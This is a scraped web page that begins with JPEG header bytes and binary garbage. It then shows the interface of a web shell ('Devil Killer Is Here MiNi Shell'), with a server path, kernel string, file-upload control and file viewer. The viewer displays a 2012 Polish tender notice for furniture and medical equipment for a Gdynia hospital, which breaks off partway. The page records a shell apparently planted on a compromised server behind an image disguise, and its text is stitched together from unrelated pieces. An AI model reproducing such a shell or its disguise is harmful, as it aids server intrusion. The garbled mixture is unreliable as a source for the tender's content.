JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120713/153357-N-2012.html

<p class="kh_header"><b>Gdynia: Przedmiotem niniejszego zamówienia jest wykonanie i montaż mebli oraz dostawa mebli  i urządzeń medycznych dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni</b><br>
<b>Numer ogłoszenia: 153357 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ Szpital Miejski im. J. Brudzińskiego , ul. Wójta Radtkego 1, 81-348 Gdynia, woj. pomorskie, tel. 058 6207501, faks 058 6201114.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://szpitalgdynia.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem niniejszego zamówienia jest wykonanie i montaż mebli oraz dostawa mebli  i urządzeń medycznych dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest wykonanie i montaż mebli oraz dostawa mebli  i urządzeń medycznych dla Szpitala Miejskiego im. J. Brudzińskiego w Gdyni. 
2.	Opis przedmiotu zamówienia oraz zamawiane ilości mebli i rządzeń zawiera załącznik nr 1b do SIWZ. Opis przedmiotu zamówienia zawarty w zał. nr 1b należy czytać łącznie z rysunkami (wizualizacją) stanowiącymi załącznik nr 4 do SIWZ
3.	Szczegółowy opis urządzeń medycznych wraz z wymaganymi parametrami technicznymi zawiera załącznik nr 1c do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.53-1, 39.15.00.00-8, 39.11.20.00-0, 33.19.20.00-2, 33.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga zabezpieczenia oferty wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiany zawartej umowy będą wymagały, pod rygorem nieważności formy pisemnej w postaci aneksu, w zakresie ustalonym w załączonym do SIWZ wzorze umowy. Istotne zmiany umowy w stosunku do treści oferty, na podstawie której wyłoniono wykonawcę, mogą dotyczyć:
1)	wynagrodzenia;
2)	miejsca dostaw;
3)	zmiany cen asortymentu wskazanego w umowie;
4)	sposobu wykonania zamówienia, w przypadku zaoferowania przez Wykonawcę rozwiązań korzystniejszych pod względem funkcjonalności lub bardziej ekonomicznych, przy czym wartość umowy nie ulegnie zwiększeniu, 
5)	materiałów użytych do realizacji zamówienia, w przypadku zaoferowania przez wykonawcę materiałów o lepszych parametrach jakościowych, przy czym wartość umowy nie ulegnie zwiększeniu
2.	Zmiany, o których mowa w ust. 1 mogą być dokonane w następujących przypadkach:
1)	ustawowej zmiany stawki podatku od towarów i usług (VAT),  przy czym zmianie ulegną wyłącznie ceny jednostkowe brutto, natomiast ceny jednostkowe  netto pozostaną bez zmian;
2)	w zakresie, o którym mowa w ust. 1 pkt. 3, w przypadku:
a)	zmian wprowadzonych przez producentów, obniżki marży;
b)	zmian kursu waluty w przypadku towarów importowanych, zgodnie z tabelą NBP;
3)	w przypadku zmiany przepisów prawa mających wpływ na warunki umowy
4)	jeżeli zmiany nie spowodują negatywnych konsekwencji dla Zamawiającego.
3.	Strona wnioskująca o zmianę umowy, przedkłada drugiej stronie pisemne uzasadnienie konieczności wprowadzenia zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalmiejski-gdynia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Miejski im. J. Brudzińskiego w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych, bud. gospodarczy pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.07.2012 godzina 10:00, miejsce: Szpital Miejski im. J. Brudzińskiego w Gdyni, ul. Wójta Radtkego 1, 81 - 348 Gdynia, Dział Zamówień Publicznych, bud. gospodarczy pok. nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MEBLE DO PORADNI KARDIOLOGICZNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	archiwum  (wg rysunku nr  1 - 2)	
1.	Osiem regałów rozmieszczonych na czterech ścianach pomieszczenia - dostosowane do wymiarów pomieszczenia, wykorzystujące maksymalnie jego wysokość i kształt; szer. pomieszczenia: ściana (a) pod skosem szer. 1620 mm wys. 1920 mm (do skosu); ściana (b) na wprost wejścia szer. 2950mm, ściana (c)po prawej stronie wejścia 1800 mm; dolna część do wysokości ok 1600 mm - regały kartotekowe z szufladami, fronty drewniane; powyżej 8  szaf na segregatory zamykane drzwiami z zamkami;  odstępy pomiędzy półkami na segregator A4 pionowo + 2 cm, głębokość szaf 340 mm ;
	
a)	regał - szer. 600 - 680 mm  	2 szt.
b)	regał - szer. 800 mm	3 szt.
c)	regał - szer. 810 mm	2 szt.
d)	regał - szer.11150 mm	1 szt.
2.	szafy na segregatory zamykane drzwiami z zamkami;  odstępy pomiędzy półkami na segregator A4 pionowo + 2 cm, głębokość szaf 340 mm	8 szt.
II.	pomieszczenie socjalne   (wg rysunku nr  3) 	
1.	szafka z drzwiami - szer. 800 mm, gł. blatu 600 mm, wys. 850 mm; wewnątrz szafki półka	1 szt.
2.	szafka z szufladami szer. 500 mm; wys. 850 mm, gł. blatu 600 mm, blat postforming w jednej części na obydwu szafkach;	1 szt.
3.	szafka wisząca z dwoma półkami szt. 1, szer. 800 mm, wys. 720 mm, gł. 320 mm	1 szt.
4.	szafka wisząca z dwoma półkami , szer. 500 mm, wys. 720 mm, gł. 320 mm	1 szt.
5.	stolik kwadratowy, wys. 750 mm, 600/600 mm; blat postforming, obrzeże PCV 2 mm; nogi stalowe śr. 60 mm	1 szt.
6.	krzesło metalowe z tapicerowanym siedziskiem i oparciem; tapicerka zmywalna 	2 szt.
III.	gabinet lekarski 1  (wg rysunku nr  4 - 6)	
1.	biurko szer. 1200 mm, gł. 600 mm, wys. 750 mm, prowadnica na klawiaturę; w blatach przepusty kablowe	1 szt.
2.	półka wisząca,  szer. 1200 mm, gł. 250 mm, wys. 750 mm; przestrzenie pomiędzy półkami na segregatory A4 pionowo	2 szt.
3.	krzesło metalowe z tapicerowanym siedziskiem i oparciem, tapicerka zmywalna	1 szt.
4.	szafka na kółkach na sprzęt medyczny: wysuwane półki szt. 3; poniżej szafka z drzwiami; szer. 600 mm, gł. 600 mm, wys. 1200 mm; nośność szuflad min. 10 kg	1 szt.
5.	szafa kartotekowa; drewniane fronty wys. ok.1600 mm szer. 800 mm szt.3; w skład każdej z trzech szaf kartotecznych wchodzą wnęki kartoteczne o wymiarach wys. 400 mm, szer. 400 mm; ilość wnęk kartotecznych przypadająca na pojedynczą szafę  kartotekową równa się 8;	3 szt.
6.	szafa kartotekowa; drewniane fronty wys. ok 1600 mm, szer.  600 mm ; w skład szafy kartotecznej wchodzą wnęki kartoteczne o wymiarach wys. 400 mm, szer. 300 mm; ilość wnęk kartotecznych w szafie  kartotekowej równa się 8	- 1 szt.
7.	nadstawka na szafę kartotekową szer. 800 mm, wysokość ok. 800 mm - wewnątrz półki na segregatory; zamek w drzwiach	3 szt.
9.	nadstawka na szafę kartotekową szer. 600.mm, wysokość ok 800 mm - wewnątrz półki na segregatory; zamek w drzwiach	1 szt.
10.	fotel obrotowy tapicerowany z podłokietnikami regulowanymi; wysokość fotela regulowana; tapicerka zmywalna, plamoodporna	1 szt.
11.	wieszak ścienny: wieszaki metalowe na płycie melaminowanej wys. 1200 mm, szer. 800 mm; (3 haki)	1 szt.
IV.	poczekalnia  (wg rysunku nr  9)	
1.	ławki z pojedynczymi krzesłami i stolikami pomiędzy nimi ( 6 siedzisk i 2 stoliki), tapicerka na krzesłach zmywalna	2 szt.
2.	wieszak ścienny: wieszaki metalowe na płycie melaminowanej wys. 1200 mm, szer. 800 mm;  (5 haków)  wraz z lustrem	1 szt.
V.	gabinet lekarski 2   (wg rysunku nr 7 i 9)	
1.	.  biurko szer. 1200 mm, gł. 600 mm, wys. 750 mm,  prowadnica na klawiaturę; w blatach przepusty kablowe	1 szt.
2.	szafka,  szer. 700 mm, gł. 400 mm wys. 750 mm, wewnątrz jedna półka o regulowanej wysokości; zamki meblowe w drzwiach	1 szt.
3.	półka wisząca ; szer. 700 mm, gł. 250 mm, wys. 750 mm; przestrzenie pomiędzy półkami na segregatory A4 pionowo	1 szt.
4.	krzesło metalowe z tapicerowanym siedziskiem i oparciem, tapicerka zmywalna	1 szt.
5.	szafka na kółkach na sprzęt medyczny : wysuwane półki szt. 3, nośność wysuwanych półek  min. 10 kg; poniżej szafka z drzwiami; szer.  600 mm, gł. 600 mm, wys. 1200 mm	3 szt.
6.	szafa kartotekowa fronty drewniane wys. ok. 1600 mm szer. 800 mm. . W skład szafy kartotecznej wchodzą wnęki kartoteczne o wymiarach wys. 400 mm, szer. 400 mm; ilość wnęk kartotecznych w szafie  kartotekowej równa się 8 - 	1 szt.
7.	nadstawka na szafę kartotekową szer.  800 mm, wysokość ok. 1600 mm (pełne wykorzystanie wysokości pomieszczenia) - wewnątrz półki na segregatory; zamek w drzwiach	1 szt.
8.	fotel obrotowy tapicerowany z podłokietnikami regulowanymi; wysokość fotela regulowana; tapicerka zmywalna, plamoodporna	1 szt.
9.	wieszak ścienny: wieszaki metalowe na płycie melaminowanej wys. 1200 mm, szer. 800 mm;  (3 haki)	1 szt.
VI.	gabinet lekarski 3  (wg rysunku nr 8 i 9)	
1.	biurko szer. 1200 mm, gł. 600 mm, wys. 750 mm,  prowadnica na klawiaturę; w blatach przepusty kablowe	1 szt.
2.	szafka ,  szer. 700 mm, gł. 400 mm wys. 750 mm, wewnątrz jedna półka o regulowanej wysokości; zamki meblowe w drzwiach	1 szt.
3.	szafa kartotekowa fronty drewniane, wys. ok. 1600 mm szer. 800 mm. W skład szafy kartotecznej wchodzą wnęki kartoteczne o wymiarach wys. 400 mm, szer. 400 mm; ilość wnęk kartotecznych w szafie  kartotekowej równa się 8;	1 szt.
4.	nadstawka na szafę kartotekową szer. 800 mm, wysokość ok  1600  mm( pełne wykorzystanie wysokości pomieszczenia) - wewnątrz półki na segregatory; zamek w drzwiach	1 szt.
5.	półka wisząca; szer. 700 mm, gł. 250 mm, wys. 750 mm; przestrzenie pomiędzy półkami na segregatory A4 pionowo	1 szt.
6.	krzesło metalowe z tapicerowanym siedziskiem i oparciem, tapicerka zmywalna	
7.	fotel obrotowy tapicerowany z podłokietnikami regulowanymi; wysokość fotela regulowana; tapicerka zmywalna, plamoodporna	1 szt.
8.	wieszak ścienny: wieszaki metalowe na płycie melaminowanej wys. 1200 mm, szer. 120 mm	3 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.53-1, 39.11.20.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> MEBLE NA BLOK  OPERACYJNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I.	śluza damska  (wg rysunku nr 10 - 11)	
1.	szafa na ubrania: szer. 900 mm, gł. 600 mm, wys. 2500 mm; górna część zamykana drzwiami, wewnątrz jedna półka; środkowa część zamykana drzwiami wysokość1450 mm , wewnątrz wieszak poprzeczny na ubrania; dolna część wysokość ok. 600 mm na buty - odstępy między półkami ok. 150 mm, dolna część bez drzwi; we wszystkich drzwiach zamki meblowe i uchwyty metalowe	2 szt.
2.	szafa na rzeczy prywatne: szer. 700 mm, gł. 600 mm; wys. 2500 m; górna część zamykana dwojgiem drzwi - wysokości ok. 680 mm; poniżej 10 przestrzeni zamykanych drzwiczkami
z zamkami meblowymi i uchwytami metalowymi; wymiar jednej przestrzeni 350/350	3 szt.
3.	szafa: szerokość ok. 880 mm; gł. 600 mm; wys. 2780 mm; wewnątrz półki regulowane; odstępy pomiędzy półkami ok. 300 mm; całość zamknięta drzwiami; w drzwiach zamki meblowe i uchwyty metalowe	2 szt.
II.	śluza męska  (wg rysunku nr  12 - 15)	
1.	szafy ubraniowe: szer. 980 mm, gł. 400 mm, wys. 2900 mm; górna część (h=800) zamykana drzwiami na zawiasach puszkowych z zamkiem, wewnątrz jedna półka; uchwyty w drzwiach ZnAl; część środkowa (h=1500) zamykana drzwiami na zawiasach puszkowych, z zamkiem; wewnątrz wieszak na ubrania; część dolna (h= ok 650 mm) otwarte półki na buty	2 szt.
2.	zabudowa składająca się z trzech szaf z półkami; wymiary zabudowy: szer. 2020 mm gł. 250-500 mm, wys. 2900 mm; szafy zamykane drzwiami na zawiasach puszkowych, z zamkami; wewnątrz półki z regulacją wysokości co 20 mm, umieszczone co 350 mm, ilość półek - 14 szt. w dwóch szafach o gł. 500 mm oraz 7 szt. w szafie o gł. 250 mm; uchwyty w drzwiach ZnAl	1 szt.
3.	szafa na rzeczy prywatne: szer. 670 mm, gł. 600 mm, wys. 2780 mm; górna część (h=680 mm) zamykana drzwiami na zawiasach puszkowych z zamkiem; wewnątrz jedna półka; uchwyty w drzwiach ZnAl; przestrzeń jednej szafki osobistej ok. 335 mm/350 mm
dolna część podzielona na 10 szafek zamykanych na klucz (h =ok 400 mm	3 szt.
4.	regały otwarte na buty czyste 1 kpl: szer. 2000 mm, gł. 350 mm, wys. 1200 mm; odstępy pomiędzy półkami ok. 150 mm	1 szt.
5.	regał otwarty do wnęki w śluzie czystej, szer. 360 mm, gł. 570 mm, wys 2230 mm; półki z regulacją wysokości; odstępy co ok. 300 mm; mebel medyczny	1 szt.
III.	pokój socjalny  (wg rysunku nr  16 - 20)	
1.	- aneks kuchenny	
a)	szafka wisząca ;  wys. 720 mm, gł. 320 mm, szer. 800 mm; wewnątrz suszarka na naczynia dostosowana do wymiarów wewnętrznych szafki, zakup suszarki po stronie wykonawcy, a  w drugiej części dwie półki regulowane na wysokość co 25 mm; pod szafką oświetlenie led dwa punkty okrągłe - zakup po stronie wykonawcy;	1 szt.
b)	szafka stojąca; wys. 850 mm, gł. 600 mm, szer. 800 mm; zabudowa zlewozmywaka metalowego, jednokomorowego  z ociekaczem o wymiarach 600 mm x 800 mm - (zakup po stronie zamawiającego)	1 szt.
c)	szafka z trzema szufladami metalowymi; wymiary wys. 850 mm, gł. 600 mm, szer. 600 mm; wymiary szuflad: dwie szuflady o wysokości 300 mm, jedna o wysokości 150 mm;
	1 szt.
d)	szafka z drzwiami i jedną półką, wys. 850 mm, gł. 600 mm, szer. 600 mm	1 szt.
e)	szafka wisząca otwarta; wymiary: wys. 720 mm, gł. 320 mm, szer. 600 mm; ilość półek 2, pierwsza na wysokości 230 mm, druga na wysokości 460 mm, możliwość regulacji co 25 mm. Półki zaokrąglone jednostronnie zgodnie z rys. nr 16	1 szt.
2.	szafka stojąca wysoka: wys. ok 3200 mm, szer. 900 mm gł. . 700 mm - w górnej części półki regulowane zamknięte dwojgiem drzwi; poniżej półka na kuchenkę mikrofalową  o wysokości 350 mm poniżej kuchenki blat postforming, pod blatem miejsce na lodówkę wolnostojącą o wymiarach wys. 850 mm, szer. 550 mm - zakup lodówki po stronie zamawiającego oraz wąska szafka z drzwiami i półką jako dopełnienie, o wymiarach wys. 850 mm, szer. 350 mm;	1 szt.
3.	stoliki: stoliki na metalowych nogach z możliwością wstawienia jeden pod drugi; blat płyta melaminowana zabezpieczona obrzeżem PCV 2 mm, nogi metalowe, blat grubość ok 30 mm  większy dł .800 mm szer. 700 mm wys 550 mm,  mniejszy dł. 600 mm, szer. 600 mm wys 450 mm 	2 szt.
4.	sofa narożna  -  nierozkładana, rozmiary max. 1800mm x 2200 mm, tapicerka wykonana z materiału zmywalnego typu skaj, derma, odporna na czyszczenie środkami dezynfekującymi	1 szt.
IV.	pokój instrumentariuszek  (wg rysunku nr  21 - 22)  	
1.	sofa - z możliwością rozłożenia, z pojemnikiem na pościel, trzyosobowa, długość max. 180 cm, tapicerka wykonana z materiału zmywalnego typu skaj, derma, odporna na czyszczenie środkami dezynfekującymi	1 szt.
2.	szafka stojąca z drzwiczkami, jedne drzwiczki, wewnątrz półka regulowana na wysokości; blat postforming; wys. 600, szer. 500mm, gł 550mm	1 szt.
3.	stolik: nogi metalowe; blat  laminat hpl, krawędzie zabezpieczone obrzeżem PCV 2 mm; wymiary 700/700 mm wysokość 600 (do sofy) mm; blat grubości ok 30 mm	1 szt.
4.	krzesła metalowe z tapicerką zmywalną, plamooporna	3 szt.
5.	półka wisząca: szer. 500 mm, gł. 200 mm, wys. 400 mm	1 szt.
V.	pokój przygotowawczy  - meble medyczne (wg rysunku nr 23 - 25)	
1.	aneks - składający się z czterech szafek stojących; fronty z płyty melaminowanej zabezpieczonej obrzeżem PCV; szuflady metalowe z systemem cichego domykania np. metabox	
a)	szafka szer. 400 mm, wys. 850 mm, gł. 600 mm,; z koszem na odpadki wysuwanym z frontem (dwa kubełki) - zakup po stronie zamawiającego	1 szt.
b)	szafka z trzema szufladami szer. 800 mm, wys. 850 mm, gł. 600 mm,  wysokość szuflad: 2 szuflady o wys. 300 mm, jedna o wys. 150 mm	2 szt.
c)	szafka narożna 995 mm/1160 mm, wys. 850 mm, gł. 600 mm; z otworem na umywalkę o szerokości 550 mm (umywalkę dostarcza zamawiający) pod umywalką wolna przestrzeń, za drugimi drzwiami półka	1 szt.
2.	szafki wiszące szer. 800 mm wys. 720 mm, gł. 320 mm;  wewnątrz dwie półki; szafka wisząca szer. 400 mm, wys. 720 mm, gł. 320 mm szt.1 wewnątrz dwie półki, szafka wisząca szer. ok 1000 mm, wys. 720, gł. 320 mm, wewnątrz dwie półki;  blat postforming gr. 28 mm; w drzwiczkach szafek zamontowane systemy cichego domykania; uchwyty metalowe ZnAl; pod szafkami wiszącymi zamontowane lampki jarzeniowe na całej długości zabudowy;	2 szt.
3.	szafa z drzwiami suwanymi: wewnątrz półki na segregatory A4 pionowo; szer. 1350 mm, wys: 2300 mm, gł. 380 mm	1 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.11.53-1, 39.11.20.00-0.</p></li>
